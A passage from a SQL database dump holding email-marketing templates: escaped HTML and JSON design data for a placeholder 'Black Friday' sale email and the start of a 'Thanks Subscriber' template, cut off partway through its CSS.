#e01223;\\\"><strong>inventore<\\/strong> <\\/span>veritatis et quasi architecto beatae vitae dicta sunt explicabo. Nemo enim ipsam voluptatem quia <span style=\\\"font-size: 14px; line-height: 18.2px; color: #e01223;\\\"><strong>voluptas sit aspernatur<\\/strong> <\\/span>aut odit aut fugit, sed quia consequuntur magni dolores eos qui ratione voluptatem sequi nesciunt. Neque porro quisquam est, qui dolorem ipsum quia dolor sit amet.<\\/span><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Lato\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:0px;font-family:\'Lato\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <table height=\\\"0px\\\" align=\\\"center\\\" border=\\\"0\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"33%\\\" style=\\\"border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;border-top: 1px solid #CCC;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n    <tbody>\\r\\n      <tr style=\\\"vertical-align: top\\\">\\r\\n        <td style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top;font-size: 0px;line-height: 0px;mso-line-height-rule: exactly;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n          <span>&#160;<\\/span>\\r\\n        <\\/td>\\r\\n      <\\/tr>\\r\\n    <\\/tbody>\\r\\n  <\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Lato\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:20px;font-family:\'Lato\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"color: #ffffff; line-height: 120%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 120%;\\\"><span style=\\\"font-family: Lato, sans-serif; font-size: 14px; line-height: 16.8px;\\\">WWW.COMPANYNAME.COM<\\/span><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 30px;background-color: #f0f0f0\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: transparent;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 30px;background-color: #f0f0f0;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: transparent;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Lato\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:20px;font-family:\'Lato\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"line-height: 120%; text-align: left; word-wrap: break-word;\\\">\\r\\n    <div style=\\\"font-family: arial, helvetica, sans-serif;\\\"><span style=\\\"font-size: 12px; color: #999999; line-height: 14.4px;\\\">You received this email because you signed up for My Company Inc<\\/span><span style=\\\"font-size: 12px; color: #999999; line-height: 14.4px;\\\">.<\\/span><\\/div>\\r\\n<div style=\\\"font-family: arial, helvetica, sans-serif;\\\">&nbsp;<\\/div>\\r\\n<div style=\\\"font-family: arial, helvetica, sans-serif;\\\"><span style=\\\"font-size: 12px; color: #999999; line-height: 14.4px;\\\">Unsubscribe<\\/span><\\/div>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n    <!--[if (mso)|(IE)]><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n  <\\/tbody>\\r\\n  <\\/table>\\r\\n  <!--[if mso]><\\/div><![endif]-->\\r\\n  <!--[if IE]><\\/div><![endif]-->\\r\\n<\\/body>\\r\\n\\r\\n<\\/html>\\r\\n\"', '\"{\\\"counters\\\":{\\\"u_row\\\":4,\\\"u_column\\\":4,\\\"u_content_text\\\":6,\\\"u_content_image\\\":2,\\\"u_content_divider\\\":2},\\\"body\\\":{\\\"id\\\":\\\"N577VjiZui\\\",\\\"rows\\\":[{\\\"id\\\":\\\"klUcYuOt24\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"eZ3EFEHf-s\\\",\\\"contents\\\":[{\\\"id\\\":\\\"B1mS6vIkz8\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"18px 20px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/a.mailmunch.co\\/user_data\\/landing_pages\\/1502399458599-adada_36.png\\\",\\\"width\\\":146,\\\"height\\\":105,\\\"maxWidth\\\":\\\"100%\\\"},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"Image\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"},\\\"url\\\":\\\"\\\",\\\"target\\\":\\\"\\\"},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_1\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_1\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"}}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"#242424\\\",\\\"columnsBackgroundColor\\\":\\\"rgba(255,255,255,0)\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":false,\\\"center\\\":true,\\\"cover\\\":false},\\\"padding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_1\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"QcupwIJycl\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"zoq74hp3Cy\\\",\\\"contents\\\":[{\\\"id\\\":\\\"ubitoo7JWB\\\",\\\"type\\\":\\\"text\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"25px 20px 0px\\\",\\\"anchor\\\":\\\"\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"100%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_1\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 100%;\\\\\\\"><span style=\\\\\\\"font-family: impact, chicago; font-size: 72px; line-height: 72px;\\\\\\\"><strong><span style=\\\\\\\"line-height: 72px; color: #ffffff; font-size: 72px;\\\\\\\"><span style=\\\\\\\"line-height: 72px; font-size: 72px;\\\\\\\">BLACK<\\/span><\\/span><\\/strong><\\/span><\\/p>\\\\n<p style=\\\\\\\"font-size: 14px; line-height: 100%;\\\\\\\"><span style=\\\\\\\"font-family: impact, chicago; font-size: 72px; line-height: 72px;\\\\\\\"><strong><span style=\\\\\\\"line-height: 72px; color: #ffffff; font-size: 72px;\\\\\\\"><span style=\\\\\\\"line-height: 72px; font-size: 72px;\\\\\\\">FRIDAY<\\/span><\\/span><\\/strong><\\/span><\\/p>\\\",\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"dm2GBgmVHg\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"9px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/a.mailmunch.co\\/user_data\\/landing_pages\\/1502396368642-s2ss_31.png\\\",\\\"width\\\":247,\\\"height\\\":30,\\\"maxWidth\\\":\\\"100%\\\"},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"Image\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"},\\\"url\\\":\\\"\\\",\\\"target\\\":\\\"\\\"},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_2\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"8wHU-ryi72\\\",\\\"type\\\":\\\"text\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"0px 20px 35px\\\",\\\"anchor\\\":\\\"\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"120%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_2\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 120%;\\\\\\\"><span style=\\\\\\\"font-size: 36px; line-height: 43.2px; color: #ffffff; font-family: Lato, sans-serif;\\\\\\\">25<span style=\\\\\\\"font-size: 14px; line-height: 16.8px;\\\\\\\">TH<\\/span> NOVEMBER<\\/span><\\/p>\\\",\\\"hideMobile\\\":false}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_2\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"}}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"#242424\\\",\\\"columnsBackgroundColor\\\":\\\"#e01223\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"https:\\/\\/a.mailmunch.co\\/user_data\\/landing_pages\\/1502396106191-asadaa_02.jpg\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":true,\\\"center\\\":true,\\\"cover\\\":false,\\\"width\\\":596,\\\"height\\\":841},\\\"padding\\\":\\\"0px 10px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_2\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"ZWV2XyDxD0\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"i2u9Sw1lHu\\\",\\\"contents\\\":[{\\\"id\\\":\\\"VWYDHstKrf\\\",\\\"type\\\":\\\"text\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"21px 15px 8px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#ffffff\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"120%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_3\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 120%;\\\\\\\"><span style=\\\\\\\"font-family: impact, chicago; font-size: 34px; line-height: 40.8px;\\\\\\\">START FROM<\\/span><\\/p>\\\\n<p style=\\\\\\\"font-size: 14px; line-height: 120%;\\\\\\\"><span style=\\\\\\\"font-family: impact, chicago; font-size: 48px; line-height: 57.6px;\\\\\\\">40% OFF<\\/span><\\/p>\\\",\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"mRVYaOXNwi\\\",\\\"type\\\":\\\"divider\\\",\\\"values\\\":{\\\"width\\\":\\\"33%\\\",\\\"border\\\":{\\\"borderTopWidth\\\":\\\"1px\\\",\\\"borderTopStyle\\\":\\\"solid\\\",\\\"borderTopColor\\\":\\\"#CCC\\\"},\\\"textAlign\\\":\\\"center\\\",\\\"containerPadding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_divider_1\\\",\\\"htmlClassNames\\\":\\\"u_content_divider\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"dQkSMjZpeb\\\",\\\"type\\\":\\\"text\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"20px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#ffffff\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"130%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_4\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 130%;\\\\\\\"><span style=\\\\\\\"font-size: 12px; line-height: 15.6px;\\\\\\\">Sed ut perspiciatis unde omnis iste natus error sit voluptatem accusantium doloremque laudantium,<span style=\\\\\\\"color: #e01223; font-size: 12px; line-height: 15.6px;\\\\\\\"><strong> totam rem<\\/strong><\\/span> aperiam, eaque ipsa quae ab illo <span style=\\\\\\\"font-size: 14px; line-height: 18.2px; color: #e01223;\\\\\\\"><strong>inventore<\\/strong> <\\/span>veritatis et quasi architecto beatae vitae dicta sunt explicabo. Nemo enim ipsam voluptatem quia <span style=\\\\\\\"font-size: 14px; line-height: 18.2px; color: #e01223;\\\\\\\"><strong>voluptas sit aspernatur<\\/strong> <\\/span>aut odit aut fugit, sed quia consequuntur magni dolores eos qui ratione voluptatem sequi nesciunt. Neque porro quisquam est, qui dolorem ipsum quia dolor sit amet.<\\/span><\\/p>\\\",\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"mdayUcLzJl\\\",\\\"type\\\":\\\"divider\\\",\\\"values\\\":{\\\"width\\\":\\\"33%\\\",\\\"border\\\":{\\\"borderTopWidth\\\":\\\"1px\\\",\\\"borderTopStyle\\\":\\\"solid\\\",\\\"borderTopColor\\\":\\\"#CCC\\\"},\\\"textAlign\\\":\\\"center\\\",\\\"containerPadding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_divider_2\\\",\\\"htmlClassNames\\\":\\\"u_content_divider\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"zh3KVfCS9k\\\",\\\"type\\\":\\\"text\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"20px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#ffffff\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"120%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_5\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 120%;\\\\\\\"><span style=\\\\\\\"font-family: Lato, sans-serif; font-size: 14px; line-height: 16.8px;\\\\\\\">WWW.COMPANYNAME.COM<\\/span><\\/p>\\\",\\\"hideMobile\\\":false}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_3\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"}}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"#242424\\\",\\\"columnsBackgroundColor\\\":\\\"rgba(255,255,255,0)\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"https:\\/\\/a.mailmunch.co\\/user_data\\/landing_pages\\/1502396106191-asadaa_02.jpg\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":true,\\\"center\\\":true,\\\"cover\\\":false,\\\"width\\\":596,\\\"height\\\":841},\\\"padding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_3\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"s_2Nb3F9V_\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"2Jd9PHXbuB\\\",\\\"contents\\\":[{\\\"id\\\":\\\"rL-yoq3ExM\\\",\\\"type\\\":\\\"text\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"20px\\\",\\\"anchor\\\":\\\"\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"120%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_6\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<div style=\\\\\\\"font-family: arial, helvetica, sans-serif;\\\\\\\"><span style=\\\\\\\"font-size: 12px; color: #999999; line-height: 14.4px;\\\\\\\">You received this email because you signed up for My Company Inc<\\/span><span style=\\\\\\\"font-size: 12px; color: #999999; line-height: 14.4px;\\\\\\\">.<\\/span><\\/div>\\\\n<div style=\\\\\\\"font-family: arial, helvetica, sans-serif;\\\\\\\">&nbsp;<\\/div>\\\\n<div style=\\\\\\\"font-family: arial, helvetica, sans-serif;\\\\\\\"><span style=\\\\\\\"font-size: 12px; color: #999999; line-height: 14.4px;\\\\\\\">Unsubscribe<\\/span><\\/div>\\\",\\\"hideMobile\\\":false}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_4\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"}}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"#f0f0f0\\\",\\\"columnsBackgroundColor\\\":\\\"rgba(255,255,255,0)\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":false,\\\"center\\\":false,\\\"cover\\\":false},\\\"padding\\\":\\\"30px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_4\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}}],\\\"values\\\":{\\\"popupPosition\\\":\\\"center\\\",\\\"popupWidth\\\":\\\"600px\\\",\\\"popupHeight\\\":\\\"auto\\\",\\\"borderRadius\\\":\\\"10px\\\",\\\"contentAlign\\\":\\\"center\\\",\\\"contentVerticalAlign\\\":\\\"center\\\",\\\"contentWidth\\\":\\\"600px\\\",\\\"fontFamily\\\":{\\\"label\\\":\\\"Lato\\\",\\\"value\\\":\\\"\'Lato\',sans-serif\\\",\\\"type\\\":\\\"google\\\",\\\"weights\\\":\\\"400,700\\\"},\\\"textColor\\\":\\\"#000000\\\",\\\"popupBackgroundColor\\\":\\\"#FFFFFF\\\",\\\"popupBackgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":false,\\\"center\\\":true,\\\"cover\\\":true},\\\"popupOverlay_backgroundColor\\\":\\\"rgba(0, 0, 0, 0.1)\\\",\\\"popupCloseButton_position\\\":\\\"top-right\\\",\\\"popupCloseButton_backgroundColor\\\":\\\"#DDDDDD\\\",\\\"popupCloseButton_iconColor\\\":\\\"#000000\\\",\\\"popupCloseButton_borderRadius\\\":\\\"0px\\\",\\\"popupCloseButton_margin\\\":\\\"0px\\\",\\\"popupCloseButton_action\\\":{\\\"name\\\":\\\"close_popup\\\",\\\"attrs\\\":{\\\"onClick\\\":\\\"document.querySelector(\'.u-popup-container\').style.display = \'none\';\\\"}},\\\"backgroundColor\\\":\\\"#f5f5f5\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":false,\\\"center\\\":true,\\\"cover\\\":false},\\\"preheaderText\\\":\\\"\\\",\\\"linkStyle\\\":{\\\"body\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_body\\\",\\\"htmlClassNames\\\":\\\"u_body\\\"}}},\\\"schemaVersion\\\":9}\"', '', 0, '2022-08-29 11:39:30');
INSERT INTO `tblma_email_templates` (`id`, `name`, `color`, `category`, `published`, `language`, `data_html`, `data_design`, `description`, `addedfrom`, `dateadded`) VALUES
(5, 'Thanks Subscriber', '', 0, 1, 'english', '\"<!DOCTYPE HTML PUBLIC \\\"-\\/\\/W3C\\/\\/DTD XHTML 1.0 Transitional \\/\\/EN\\\" \\\"http:\\/\\/www.w3.org\\/TR\\/xhtml1\\/DTD\\/xhtml1-transitional.dtd\\\">\\r\\n<html xmlns=\\\"http:\\/\\/www.w3.org\\/1999\\/xhtml\\\" xmlns:v=\\\"urn:schemas-microsoft-com:vml\\\" xmlns:o=\\\"urn:schemas-microsoft-com:office:office\\\">\\r\\n<head>\\r\\n<!--[if gte mso 9]>\\r\\n<xml>\\r\\n  <o:OfficeDocumentSettings>\\r\\n    <o:AllowPNG\\/>\\r\\n    <o:PixelsPerInch>96<\\/o:PixelsPerInch>\\r\\n  <\\/o:OfficeDocumentSettings>\\r\\n<\\/xml>\\r\\n<![endif]-->\\r\\n  <meta http-equiv=\\\"Content-Type\\\" content=\\\"text\\/html; charset=UTF-8\\\">\\r\\n  <meta name=\\\"viewport\\\" content=\\\"width=device-width, initial-scale=1.0\\\">\\r\\n  <meta name=\\\"x-apple-disable-message-reformatting\\\">\\r\\n  <!--[if !mso]><!--><meta http-equiv=\\\"X-UA-Compatible\\\" content=\\\"IE=edge\\\"><!--<![endif]-->\\r\\n  <title><\\/title>\\r\\n  \\r\\n    <style type=\\\"text\\/css\\\">\\r\\n      @media only screen and (min-width: 620px) {\\r\\n  .u-row {\\r\\n    width: 600px !important;\\r\\n  }\\r\\n  .u-row .u-col {\\r\\n    vertical-align: top;\\r\\n  }\\r\\n\\r\\n  .u-row .u-col-100 {\\r\\n    width: 600px !important;\\r\\n  }\\r\\n\\r\\n}\\r\\n\\r\\n@media (max-width: 620px) {\\r\\n  .u-row-container {\\r\\n    max-width: 100% !important;\\r\\n    padding-left: 0px !important;\\r\\n    padding-right: 0px !important;\\r\\n  }\\r\\n  .u-row .u-col {\\r\\n    min-width: 320px !important;\\r\\n    max-width: 100% !important;\\r\\n    display: block !important;\\r\\n  }\\r\\n  .u-row {\\r\\n    width: calc(100% - 40px) !important;\\r\\n  }\\r\\n  .u-col {\\r\\n    width: 100% !important;\\r\\n  }\\r\\n  .u-col > div {\\r\\n    margin: 0 auto;\\r\\n  }\\r\\n}\\r\\nbody {\\r\\n  margin: 0;\\r\\n  padding: 0;\\r\\n}\\r\\n\\r\\ntable,\\r\\ntr,\\r\\ntd {\\r\\n  vertical-align: top;\\r\\n  border-collapse: collapse;\\r\\n}\\r\\n\\r\\np {\\r\\n  margin: 0;\\r\\n}\\r\\n\\r\\n.ie-container table,\\r\\n.mso-container table {\\r\\n  table-layout: fixed;\\r\\n}\\r\\n\\r\\n* {\\r\\n  line-height: inherit;\\r\\n}\\r\\n\\r\\na[x-apple-data-detectors=\'true\'] {\\r\\n  color: inherit !important;\\r\\n  text-decoration: none 